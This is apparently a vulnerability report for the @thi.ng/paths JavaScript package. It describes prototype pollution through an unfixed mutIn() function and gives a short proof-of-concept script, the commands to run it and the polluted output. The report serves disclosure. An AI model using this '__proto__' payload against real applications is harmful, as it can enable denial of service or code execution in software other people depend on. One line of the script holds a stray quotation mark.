Prototype Pollution in thi-ng/umbrella
Valid
Reported on
Jan 26th 2021
Description
@thi.ng/paths
is vulnerable to Prototype Pollution
. The vulnerability is due to an incomplete fix. mutIn()
function does not have fix implemented.
Proof of Concept
- Create the following PoC file:
// poc.js
const paths = require('@thi.ng/paths')
console.log("Before: ", {}.polluted")
paths.mutIn({}, '__proto__.polluted', true)
console.log("After: ", {}.polluted)
- Execute the following commands in the terminal:
npm i @thi.ng/paths # install vulnerable package
node poc.js # run the PoC
- Check the output:
Before: undefined
After: true
Impact
Prototype Pollution
leads to Information Disclosure/DoS/RCE.
to join this conversation